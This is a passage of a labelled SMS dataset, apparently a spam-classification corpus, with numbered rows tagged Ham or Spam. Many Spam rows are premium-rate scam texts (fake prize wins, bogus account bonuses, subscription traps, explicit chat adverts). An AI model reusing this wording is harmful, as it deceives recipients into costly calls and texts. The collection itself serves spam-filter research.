the very latest offers. 08000839402 or call2optout/LF56 161 | Ham Thanks love. But am i doing torch or bold. 162 | Ham We have all rounder:)so not required:) 163 | Ham What you did in leave. 164 | Ham Which is weird because I know I had it at one point 165 | Ham I sent you the prices and do you mean the <#> g, 166 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY 167 | Ham Company is very good.environment is terrific and food is really nice:) 168 | Ham Arun can u transfr me d amt 169 | Ham Where to get those? 170 | Ham I dont thnk its a wrong calling between us 171 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH. 172 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize! 173 | Spam Cashbin.co.uk (Get lots of cash this weekend!) www.cashbin.co.uk Dear Welcome to the weekend We have got our biggest and best EVER cash give away!! These.. 174 | Spam Sunshine Quiz! Win a super Sony DVD recorder if you canname the capital of Australia? Text MQUIZ to 82277. B 175 | Ham Mmmmmmm *snuggles into you* ...*deep contented sigh* ... *whispers* ... I fucking love you so much I can barely stand it ... 176 | Spam Wan2 win a Meet+Greet with Westlife 4 U or a m8? They are currently on what tour? 1)Unbreakable, 2)Untamed, 3)Unkempt. Text 1,2 or 3 to 83049. Cost 50p +std text 177 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription 178 | Ham We have sent JD for Customer Service cum Accounts Executive to ur mail id, For details contact us 179 | Spam tells u 2 call 09066358152 to claim £5000 prize. U have 2 enter all ur mobile & personal details @ the prompts. Careful! 180 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094599 181 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also? 182 | Ham Okie 183 | Ham Dai <#> naal eruku. 184 | Spam FREE GAME. Get Rayman Golf 4 FREE from the O2 Games Arcade. 1st get UR games settings. Reply POST, then save & activ8. Press 0 key for Arcade. Termsapply 185 | Spam YOU HAVE WON! As a valued Vodafone customer our computer has picked YOU to win a £150 prize. To collect is easy. Just call 09061743386 186 | Ham You've already got a flaky parent. It'snot supposed to be the child's job to support the parent...not until they're The Ride age anyway. I'm supposed to be there to support you. And now i've hurt you. 187 | Ham Easy mate, * guess the quick drink was bit ambitious. 188 | Spam Save money on wedding lingerie at www.bridal.petticoatdreams.co.uk Choose from a superb selection with national delivery. Brought to you by WeddingFriend 189 | Ham U so lousy, run already come back then half dead... Hee... 190 | Ham Yup song bro. No creative. Neva test quality. He said check review online. 191 | Spam Do you want 750 anytime any network mins 150 text and a NEW VIDEO phone for only five pounds per week call 08002888812 or reply for delivery tomorrow 192 | Ham Petey boy whereare you me and all your friendsare in theKingshead come down if you canlove Nic 193 | Spam * FREE* POLYPHONIC RINGTONE Text SUPER to 87131 to get your FREE POLY TONE of the week now! 16 SN PoBox202 NR31 7ZS subscription 450pw 194 | Spam The current leading bid is 151. To pause this auction send OUT. Customer Care: 08718726270 195 | Spam Ever thought about living a good life with a perfect partner? Just txt back NAME and AGE to join the mobile community. (100p/SMS) 196 | Ham "Beautiful Truth against Gravity.. Read carefully: ""Our heart feels light when someone is in it.. But it feels very heavy when someone leaves it.."" GOODMORNING" 197 | Spam You will recieve your tone within the next 24hrs. For Terms and conditions please see Channel U Teletext Pg 750 198 | Spam Urgent Urgent! We have 800 FREE flights to Europe to give away, call B4 10th Sept & take a friend 4 FREE. Call now to claim on 09050000555. BA128NNFWFLY150ppm 199 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update VCo FREE on 08002986906 200 | Ham "Feb <#> is ""I LOVE U"" day. Send dis to all ur ""VALUED FRNDS"" evn me. If 3 comes back u'll gt married d person u luv! If u ignore dis u will lose ur luv 4 Evr" 201 | Ham Oh ho. Is this the first time u use these type of words 202 | Spam Ur balance is now £600. Next question: Complete the landmark, Big, A. Bob, B. Barry or C. Ben ?. Text A, B or C to 83738. Good luck! 203 | Ham I cant pick the phone right now. Pls send a message 204 | Spam Bored housewives! Chat n date now! 0871750.77.11! BT-national rate 10p/min only from landlines! 205 | Ham <#> in mca. But not conform. 206 | Ham The greatest test of courage on earth is to bear defeat without losing heart....gn tc 207 | Ham That means you got an A in epi, she.s fine. She.s here now. 208 | Ham K ill drink.pa then what doing. I need srs model pls send it to my mail id pa. 209 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 210 | Spam This is the 2nd time we have tried 2 contact u. U have won the 750 Pound prize. 2 claim is easy, call 08712101358 NOW! Only 10p per min. BT-national-rate 211 | Spam For taking part in our mobile survey yesterday! You can now have 500 texts 2 use however you wish. 2 get txts just send TXT to 80160 T&C www.txt43.com 1.50p 212 | Ham Sorry i'm not free... 213 | Spam Get your garden ready for summer with a FREE selection of summer bulbs and seeds worth £33:50 only with The Scotsman this Saturday. To stop go2 notxt.co.uk 214 | Spam You have 1 new message. Please call 08712400200. 215 | Spam RT-KIng Pro Video Club>> Need help? info@ringtoneking.co.uk or call 08701237397 You must be 16+ Club credits redeemable at www.ringtoneking.co.uk! Enjoy! 216 | Ham Jay wants to work out first, how's 4 sound? 217 | Spam FreeMsg: Txt: CALL to No: 86888 & claim your reward of 3 hours talk time to use from your phone now! Subscribe6GBP/mnth inc 3hrs 16 stop?txtStop 218 | Ham Oh ok.. 219 | Spam PRIVATE! Your 2004 Account Statement for 078498****7 shows 786 unredeemed Bonus Points. To claim call 08719180219 Identifier Code: 45239 Expires 06.05.05 220 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16 221 | Ham Dude u knw also telugu..thts gud..k, gud nyt.. 222 | Spam Double Mins & 1000 txts on Orange tariffs. Latest Motorola, SonyEricsson & Nokia with Bluetooth FREE! Call MobileUpd8 on 08000839402 or call2optout/HF8 223 | Spam FreeMsg Hey U, i just got 1 of these video/pic fones, reply WILD to this txt & ill send U my pics, hurry up Im so bored at work xxx (18 150p/rcvd STOP2stop) 224 | Spam Block Breaker now comes in deluxe format with new features and great graphics from T-Mobile. Buy for just £5 by replying GET BBDELUXE and take the challenge 225 | Ham Yar lor... How u noe? U used dat route too? 226 | Spam Latest News! Police station toilet stolen, cops have nothing to go on! 227 | Spam FREE NOKIA Or Motorola with upto 12mths 1/2price linerental, 500 FREE x-net mins&100txt/mth FREE B'tooth*. Call Mobileupd8 on 08001950382 or call 2optout/D3WV 228 | Spam Hi its LUCY Hubby at meetins all day Fri & I will B alone at hotel U fancy cumin over? Pls leave msg 2day 09099726395 Lucy x Calls£1/minMobsmoreLKPOBOX177HP51FL 229 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 230 | Ham Sorry, I'll call later in meeting. 231 | Ham K...k:)why cant you come here and search job:) 232 | Spam FREE>Ringtone! Reply REAL or POLY eg REAL1 1. PushButton 2. DontCha 3. BabyGoodbye 4. GoldDigger 5. WeBeBurnin 1st tone FREE and 6 more when u join for £3/wk 233 | Spam Hungry gay guys feeling hungry and up 4 it, now. Call 08718730555 just 10p/min. To stop texts call 08712460324 (10p/min) 234 | Ham How are you, my Love ? Are you with your brother ? Time to talk english with him ? *grins* Say : Hey Muhommad, Penny says hello from across the sea 235 | Spam wamma get laid?want real doggin locations sent direct to your mobile? join the UKs largest dogging network. txt dogs to 69696 now!nyt. ec2a. 3lp £1.50/msg. 236 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 237 | Ham Shant disturb u anymore... Jia you... 238 | Spam Want 2 get laid tonight? Want real Dogging locations sent direct 2 ur mob? Join the UK's largest Dogging Network bt Txting GRAVEL to 69888! Nt. ec2a. 31p.msg@150p 239 | Spam Auction round 4. The highest bid is now £54. Next maximum bid is £71. To bid, send BIDS e. g. 10 (to bid £10) to 83383. Good luck. 240 | Spam XMAS Prize draws! We are trying to contact U. Todays draw shows that you have won a £2000 prize GUARANTEED. Call 09058094565 from land line. Valid 12hrs only 241 | Spam This message is brought to you by GMW Ltd. and is not connected to the 242 | Ham Hello! Good week? Fancy a drink or something later? 243 | Ham :) 244 | Ham Babe ! What are you doing ? Where are you ? Who are you talking to ? Do you think of me ? Are you being a good boy? Are you missing me? Do you love me ? 245 | Ham OH FUCK. JUSWOKE UP IN A BED ON A BOATIN THE DOCKS. SLEPT WID 25 YEAR OLD. SPINOUT! GIV U DA GOSSIP L8R. XXX 246 | Ham Sorry * was at the grocers. 247 | Ham How abt making some of the pics bigger? 248 | Ham Its ok..come to my home it vl nice to meet and v can chat.. 249 | Ham aathi..where are you dear.. 250 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 251 | Ham It wont b until 2.15 as trying 2 sort house out, is that ok? 252 | Spam Thanks for the Vote. Now sing along with the stars with Karaoke on your mobile. For a FREE link just reply with SING now. 253 | Spam I am hot n horny and willing I live local to you - text a reply to hear strt back from me 150p per msg Netcollex LtdHelpDesk: 02085076972 reply Stop to end 254 | Spam I want some cock! My hubby's away, I need a real man 2 satisfy me. Txt WIFE to 89938 for no strings action. (Txt STOP 2 end, txt rec £1.50ea. OTBox 731 LA1 7WS. ) 255 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+ 256 | Spam Summers finally here! Fancy a chat or flirt with sexy singles in yr area? To get MATCHED up just reply SUMMER now. Free 2 Join. OptOut txt STOP Help08714742804 257 | Ham How much it will cost approx . Per month. 258 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award 259 | Spam Please call our customer service representative on FREEPHONE 0808 145 4742 between 9am-11pm as you have WON a guaranteed £1000 cash or £5000 prize! 260 | Ham So many people seems to be special at first sight, But only very few will remain special to you till your last sight.. Maintain them till life ends.. Sh!jas 261 | Ham We stopped to get ice cream and will go back after 262 | Ham No da..today also i forgot.. 263 | Ham Good morning princess! Have a great day! 264 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone 265 | Spam Your account has been credited with 500 FREE Text Messages. To activate, just txt the word: CREDIT to No: 80488 T&Cs www.80488.biz 266 | Ham K..then come wenever u lik to come and also tel vikky to come by getting free time..:-) 267 | Ham Cant think of anyone with * spare room off * top of my head 268 | Ham There's no point hangin on to mr not right if he's not makin u happy 269 | Ham Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out. 270 | Ham We don call like <#> times oh. No give us hypertension oh. 271 | Spam PRIVATE! Your 2003 Account Statement for 07973788240 shows 800 un-redeemed S. I. M. points. Call 08715203649 Identifier Code: 40533 Expires 31/10/04 272 | Ham Dear,Me at cherthala.in case u r coming cochin pls call bfore u start.i shall also reach accordingly.or tell me which day u r coming.tmorow i am engaged ans its holiday. 273 | Ham Yo, you gonna still be in stock tomorrow/today? I'm trying to get a dubsack 274 | Spam Last chance 2 claim ur £150 worth of discount vouchers-Text YES to 85023 now!SavaMob-member offers mobile T Cs 08717898035. £3.00 Sub. 16 . Remove txt X or STOP 275 | Spam URGENT! We are trying to contact U. Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050001808 from land line. Claim M95. Valid12hrs only 276 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S.I.M. points. Call 08718738001 Identifier Code: 49557 Expires 26/11/04 277 | Ham Havent. 278 | Spam Collect your VALENTINE'S weekend to PARIS inc Flight & Hotel + £200 Prize guaranteed! Text: PARIS to No: 69101. www.rtf.sphosting.com 279 | Ham Hope you’re not having too much fun without me!! see u tomorrow love jess x 280 | Spam Final Chance! Claim ur £150 worth of discount vouchers today! Text YES to 85023 now! SavaMob, member offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Subs 16 281 | Ham My drive can only be read. I need to write 282 | Spam Dear U've been invited to XCHAT. This is our final attempt to contact u! Txt CHAT to 86688 150p/MsgrcvdHG/Suite342/2Lands/Row/W1J6HL LDN 18 yrs 283 | Ham Sorry, I'll call later 284 | Ham Nowadays people are notixiquating the laxinorficated opportunity for bambling of entropication.... Have you ever oblisingately opted ur books for the masteriastering amplikater of fidalfication? It is 285 | Ham Ok. No wahala. Just remember that a friend in need ... 286 | Spam UpgrdCentre Orange customer, you may now claim your FREE CAMERA PHONE upgrade for your loyalty. Call now on 0207 153 9153. Offer ends 26th July. T&C's apply. Opt-out available 287 | Ham Am slow in using biola's fne 288 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u? 289 | Ham From here after The performance award is calculated every two month.not for current one month period.. 290 | Spam Good Luck! Draw takes place 28th Feb 06. Good Luck! For removal send STOP to 87239 customer services 08708034412 291 | Spam Urgent! Please call 09061213237 from landline. £5000 cash or a luxury 4* Canary Islands Holiday await collection. T&Cs SAE PO Box 177. M227XY. 150ppm. 16+ 292 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 293 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ 294 | Ham Wife.how she knew the time of murder exactly 295 | Ham Oooh bed ridden ey? What are YOU thinking of? 296 | Spam Back 2 work 2morro half term over! Can U C me 2nite 4 some sexy passion B4 I have 2 go back? Chat NOW 09099726481 Luv DENA Calls £1/minMobsmoreLKPOBOX177HP51FL 297 | Spam Ur ringtone service has changed! 25 Free credits! Go to club4mobiles.com to choose content now! Stop? txt CLUB STOP to 87070. 150p/wk Club4 PO Box1146 MK45 2WT 298 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ? 299 | Spam Win a £1000 cash prize or a prize worth £5000 300 | Spam PRIVATE! Your 2004 Account Statement for 07742676969 shows 786 unredeemed Bonus Points. To claim call 08719180248 Identifier Code: 45239 Expires 301 | Spam Wanna have a laugh? Try CHIT-CHAT on your mobile now! Logon by txting the word: CHAT and send it to No: 8883 CM PO Box 4217 London W1A 6ZF 16+ 118p/msg rcvd 302 | Spam Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. £3.00 Sub. 16 . Unsub reply X 303 | Ham Still work going on:)it is very small house. 304 | Spam money!!! you r a lucky winner ! 2 claim your prize text money 2 88600 over £1million to give away ! ppt150x3+normal text rate box403 w1t1jy 305 | Ham Some of them told accenture is not confirm. Is it true. 306 | Ham I am taking half day leave bec i am not well 307 | Spam 87077: Kick off a new season with 2wks FREE goals & news to ur mobile! Txt ur club name to 87077 eg VILLA to 87077 308 | Ham Good sleep is about rhythm. The person has to establish a rhythm that the body will learn and use. If you want to know more :-) 309 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 310 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 311 | Ham Nope thats fine. I might have a nap tho! 312 | Ham Ok u can take me shopping when u get paid =D 313 | Spam Money i have won wining number 946 wot do i do next 314 | Ham Mm feeling sleepy. today itself i shall get that dear 315 | Ham 7 lor... Change 2 suntec... Wat time u coming? 316 | Ham Beautiful tomorrow never comes.. When it comes, it's already TODAY.. In the hunt of beautiful tomorrow don't waste your wonderful TODAY.. GOODMORNING:) 317 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime any networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW 318 | Spam U 447801259231 have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094597 319 | Spam Hello darling how are you today? I would love to have a chat, why dont you tell me what you look like and what you are in to sexy? 320 | Ham Have you finished work yet? :) 321 | Ham I guess you could be as good an excuse as any, lol. 322 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09058094455 from land line. Claim 3030. Valid 12hrs only 323 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW 324 | Ham Gokila is talking with you aha:) 325 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712379 between 10am-7pm Cost 10p 326 | Spam "Free Msg: get Gnarls Barkleys ""Crazy"" ringtone TOTALLY FREE just reply GO to this message right now!" 327 | Ham That's good. Lets thank God. Please complete the drug. Have lots of water. And have a beautiful day. 328 | Ham Just sent it. So what type of food do you like? 329 | Spam Talk sexy!! Make new friends or fall in love in the worlds most discreet text dating service. Just text VIP to 83110 and see who you could meet. 330 | Ham Having lunch:)you are not in online?why? 331 | Spam We currently have a message awaiting your collection. To collect your message just call 08718723815. 332 | Spam YOUR CHANCE TO BE ON A REALITY FANTASY SHOW call now = 08707509020 Just 20p per min NTT Ltd, PO Box 1327 Croydon CR9 5WB 0870 is a national = rate call. 333 | Ham Tired. I haven't slept well the past few nights. 334 | Ham Any chance you might have had with me evaporated as soon as you violated my privacy by stealing my phone number from your employer's paperwork. Not cool at all. Please do not contact me again or I wil 335 | Spam Burger King - Wanna play footy at a top stadium? Get 2 Burger King before 1st Sept and go Large or Super with Coca-Cola and walk out a winner 336 | Ham Oops. 4 got that bit. 337 | Ham No message..no responce..what happend? 338 | Ham Dont search love, let love find U. Thats why its called falling in love, bcoz U dont force yourself, U just fall and U know there is smeone to hold U... BSLVYL 339 | Spam Hi babe its Chloe, how r u? I was smashed on saturday night, it was great! How was your weekend? U been missing me? SP visionsms.com Text stop to stop 150p/text 340 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU 341 | Spam "You have been specially selected to receive a ""3000 award! Call 08712402050 BEFORE the lines close. Cost 10ppm. 16+. T&Cs apply. AG Promo" 342 | Ham Good afternoon, my love! How goes that day ? I hope maybe you got some leads on a job. I think of you, boytoy and send you a passionate kiss from across the sea 343 | Ham If you don't respond imma assume you're still asleep and imma start calling n shit 344 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins 345 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058097189 NOW all will be revealed. POBox 6, LS15HB 150p 346 | Spam How come it takes so little time for a child who is afraid of the dark to become a teenager who wants to stay out all night? 347 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S. I. M. points. Call 08715203656 Identifier Code: 42049 Expires 26/10/04 348 | Spam SMS. ac JSco: Energy is high, but u may not know where 2channel it. 2day ur leadership skills r strong. Psychic? Reply ANS w/question. End? Reply END JSCO 349 | Spam URGENT! Your mobile No *********** WON a £2,000 Bonus Caller Prize on 02/06/03! This is the 2nd attempt to reach YOU! Call 09066362220 ASAP! BOX97N7QP, 150ppm 350 | Ham U wan 2 haf lunch i'm in da canteen now. 351 | Ham I can’t wait for cornwall. Hope tonight isn’t too bad as well but it’s rock night shite. Anyway i’m going for a kip now have a good night. Speak to you soon. 352 | Spam PRIVATE! Your 2003 Account Statement for 07808247860 shows 800 un-redeemed S. I. M. points. Call 08719899229 Identifier Code: 40411 Expires 06/11/04 353 | Spam New Tones This week include: 1)McFly-All Ab.., 2) Sara Jorge-Shock.. 3) Will Smith-Switch.. To order follow instructions on next message 354 | Spam You are being ripped off! Get your mobile content from www.clubmoby.com call 08717509990 poly/true/Pix/Ringtones/Games six downloads for only 3 355 | Spam This weeks SavaMob member offers are now accessible. Just call 08709501522 for details! SavaMob, POBOX 139, LA3 2WU. Only £1.50/week. SavaMob - offers mobile! 356 | Ham Daddy, shu shu is looking 4 u... U wan me 2 tell him u're not in singapore or wat? 357 | Ham No..few hours before.went to hair cut . 358 | Ham Yes baby! We can study all the positions of the kama sutra ;) 359 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever.... 360 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 361 | Ham I think just yourself …Thanks and see you tomo 362 | Spam SIX chances to win CASH! From 100 to 20,000 pounds txt> CSH11 and send to 87575. Cost 150p/day, 6days, 16+ TsandCs apply Reply HL 4 info 363 | Ham All these nice new shirts and the only thing I can wear them to is nudist themed ;_; you in mu? 364 | Ham X2 <#> . Are you going to get that 365 | Ham HI HUN! IM NOT COMIN 2NITE-TELL EVERY1 IM SORRY 4 ME, HOPE U AVA GOODTIME!OLI RANG MELNITE IFINK IT MITE B SORTED,BUT IL EXPLAIN EVERYTHIN ON MON.L8RS.x 366 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!! 367 | Spam England v Macedonia - dont miss the goals/team news. Txt ur national team to 87077 eg ENGLAND to 87077 Try:WALES, SCOTLAND 4txt/ú1.20 POBOXox36504W45WQ 16+ 368 | Ham Hello, my love! How goes that day ? I wish your well and fine babe and hope that you find some job prospects. I miss you, boytoy ... *a teasing kiss* 369 | Spam Hi 07734396839 IBH Customer Loyalty Offer: The NEW NOKIA6600 Mobile from ONLY £10 at TXTAUCTION!Txt word:START to No:81151 & get Yours Now!4T& 370 | Spam Had your mobile 10 mths? Update to the latest Camera/Video phones for FREE. KEEP UR SAME NUMBER, Get extra free mins/texts. Text YES for a call 371 | Ham U too... 372 | Spam BangBabes Ur order is on the way. U SHOULD receive a Service Msg 2 download UR content. If U do not, GoTo wap. bangb. tv on UR mobile internet/service menu 373 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come... 374 | Spam Great NEW Offer - DOUBLE Mins & DOUBLE Txt on best Orange tariffs AND get latest camera phones 4 FREE! Call MobileUpd8 free on 08000839402 NOW! or 2stoptxt T&Cs 375 | Ham "Painful words- ""I thought being Happy was the most toughest thing on Earth... But, the toughest is acting Happy with all unspoken pain inside..""" 376 | Spam Marvel Mobile Play the official Ultimate Spider-man game (£4.50) on ur mobile right now. Text SPIDER to 83338 for the game & we ll send u a FREE 8Ball wallpaper 377 | Ham The affidavit says <#> E Twiggs St, division g, courtroom <#> , <TIME> AM. I'll double check and text you again tomorrow 378 | Ham New Theory: Argument wins d SITUATION, but loses the PERSON. So dont argue with ur friends just.. . . . kick them & say, I'm always correct.! 379 | Ham K, my roommate also wants a dubsack and another friend may also want some so plan on bringing extra, I'll tell you when they know for sure 380 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030 381 | Spam thesmszone.com lets you send free anonymous and masked messages..im sending this message from there..do you see the potential for abuse??? 382 | Ham Yar lor he wan 2 go c horse racing today mah, so eat earlier lor. I ate chicken rice. U? 383 | Ham Lol enjoy role playing much? 384 | Ham Pls speak to that customer machan. 385 | Spam TheMob> Check out our newest selection of content, Games, Tones, Gossip, babes and sport, Keep your mobile fit and funky text WAP to 82468 386 | Spam "SMS. ac sun0819 posts HELLO:""You seem cool, wanted to say hi. HI!!!"" Stop? Send STOP to 62468" 387 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update Co FREE on 08002986906 388 | Ham Faith makes things possible,Hope makes things work,Love makes things beautiful,May you have all three this Christmas!Merry Christmas! 389 | Ham Thank you. I like you as well... 390 | Ham I need... Coz i never go before 391 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 TXTAUCTION 392 | Ham Mm that time you dont like fun 393 | Spam 1000's flirting NOW! Txt GIRL or BLOKE & ur NAME & AGE, eg GIRL ZOE 18 to 8007 to join and get chatting! 394 | Ham Haha awesome, I've been to 4u a couple times. Who all's coming? 395 | Ham Just woke up. Yeesh its late. But I didn't fall asleep til <#> am :/ 396 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094565 397 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q? 398 | Spam "FREE RING TONE just text ""POLYS"" to 87131. Then every week get a new tone. 0870737910216yrs only £1.50/wk." 399 | Ham Ok can... 400 | Spam Get ur 1st RINGTONE FREE NOW! Reply to this msg with TONE. Gr8 TOP 20 tones to your phone every week just £1.50 per wk 2 opt out send STOP 08452810071 16 401 | Spam Get a brand new mobile phone by being an agent of The Mob! Plus loads more goodies! For more info just text MAT to 87021. 402 | Ham I sent them. Do you like? 403 | Ham Good. do you think you could send me some pix? I would love to see your top and bottom... 404 | Ham I accidentally brought em home in the box 405 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days. 406 | Ham S....s...india going to draw the series after many years in south african soil.. 407 | Spam IMPORTANT MESSAGE. This is a final contact attempt. You have important messages waiting out our customer claims dept. Expires 13/4/04. Call 08717507382 NOW! 408 | Ham You'd like that wouldn't you? Jerk! 409 | Ham How long does it take to get it. 410 | Spam Our records indicate u maybe entitled to 5000 pounds in compensation for the Accident you had. To claim 4 free reply with CLAIM to this msg. 2 stop txt STOP 411 | Ham Oh:)as usual vijay film or its different? 412 | Ham Tmr then ü brin lar... Aiya later i come n c lar... Mayb ü neva set properly ü got da help sheet wif ü... 413 | Spam Loan for any purpose £500 - £75,000. Homeowners + Tenants welcome. Have you been previously refused? We can still help. Call Free 0800 1956669 or text back 'help' 414 | Ham So li hai... Me bored now da lecturer repeating last weeks stuff waste time... 415 | Spam cmon babe, make me horny, *turn* me on! Txt me your fantasy now babe -) Im hot, sticky and need you now. All replies cost £1.50. 2 cancel send STOP 416 | Spam Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk 417 | Ham Oh great. I.ll disturb him more so that we can talk. 418 | Ham I have 2 sleeping bags, 1 blanket and paper and phone details. Anything else? 419 | Spam URGENT! You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18 420 | Ham Great! So what attracts you to the brothas? 421 | Ham My supervisor find 4 me one lor i thk his students. I havent ask her yet. Tell u aft i ask her. 422 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+ 423 | Ham O we cant see if we can join denis and mina? Or does denis want alone time 424 | Spam Can U get 2 phone NOW? I wanna chat 2 set up meet Call me NOW on 09096102316 U can cum here 2moro Luv JANE xx Calls£1/minmoremobsEMSPOBox45PO139WA 425 | Ham Jordan got voted out last nite! 426 | Ham Tomarrow i want to got to court. At <DECIMAL> . So you come to bus stand at 9. 427 | Ham I dont thnk its a wrong calling between us 428 | Spam Congratulations - Thanks to a good friend U have WON the £2,000 Xmas prize. 2 claim is easy, just call 08712103738 NOW! Only 10p per minute. BT-national-rate 429 | Ham I could ask carlos if we could get more if anybody else can chip in 430 | Ham You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later. 431 | Spam important information 4 orange user 0789xxxxxxx. today is your lucky day!2find out why log onto http://www.urawinner.com THERE'S A FANTASTIC SURPRISE AWAITING YOU! 432 | Spam New TEXTBUDDY Chat 2 horny guys in ur area 4 just 25p Free 2 receive Search postcode or at gaytextbuddy.com. TXT ONE name to 89693 433 | Spam Guess what! Somebody you know secretly fancies you! Wanna find out who it is? Give us a call on 09065394514 From Landline DATEBox1282EssexCM61XN 150p/min 18 434 | Ham I'm home... 435 | Spam GSOH? Good with SPAM the ladies?U could b a male gigolo? 2 join the uk's fastest growing mens club reply ONCALL. mjzgroup. 08714342399.2stop reply STOP. msg@£1.50rcvd 436 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply 437 | Spam URGENT! Last weekend's draw shows that you have won £1000 cash or a Spanish holiday! CALL NOW 09050000332 to claim. T&C: RSTM, SW7 3SS. 150ppm 438 | Ham My Parents, My Kidz, My Friends n My Colleagues. All screaming.. SURPRISE !! and I was waiting on the sofa.. ... ..... ' NAKED...! 439 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712412 between 10am-7pm Cost 10p 440 | Spam Had your mobile 11mths ? Update for FREE to Oranges latest colour camera mobiles & unlimited weekend calls. Call Mobile Upd8 on freefone 08000839402 or 2StopTx 441 | Spam Reply to win £100 weekly! Where will the 2006 FIFA World Cup be held? Send STOP to 87239 to end service 442 | Ham Ok i vl..do u know i got adsense approved.. 443 | Spam 88800 and 89034 are premium phone services call 08718711108 444 | Spam Hi this is Amy, we will be sending you a free phone number in a couple of days, which will give you an access to all the adult parties... 445 | Ham How's my loverboy doing ? What 